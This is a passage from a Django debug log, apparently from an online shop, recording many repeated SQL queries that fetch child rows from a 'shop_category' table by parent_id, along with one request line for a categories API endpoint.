09:54:43,093 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:54:43,095 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:54:43,098 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:54:43,101 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:54:43,104 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:54:43,108 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:54:43,112 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:54:43,115 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:54:43,118 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:54:43,122 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:54:43,125 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:54:43,130 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:54:43,133 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:54:43,136 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:54:43,139 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:54:43,142 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:54:43,147 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:54:43,150 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:54:43,153 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:54:43,156 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:54:43,159 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:54:43,162 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:54:43,166 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:54:43,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:54:43,172 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:54:43,176 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:54:43,179 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:54:43] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 09:55:01,336 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:55:01,347 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:55:01,351 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:55:01,354 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:55:01,358 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:55:01,361 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:55:01,364 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:55:01,366 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:55:01,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:55:01,373 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:55:01,376 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:55:01,379 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:55:01,381 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:55:01,384 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:55:01,388 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:55:01,391 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:55:01,394 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:55:01,396 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:55:01,398 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:55:01,402 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:55:01,405 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:55:01,407 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:55:01,410 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:55:01,412 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:55:01,414 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:55:01,418 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:55:01,420 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:55:01,422 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:55:01,424 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:55:01,427 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:55:01,430 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:55:01,433 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:55:01,435 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:55:01,438 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:55:01,440 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:55:01,444 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:55:01,446 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:55:01,448 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:55:01,451 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:55:01,453 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:55:01,455 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 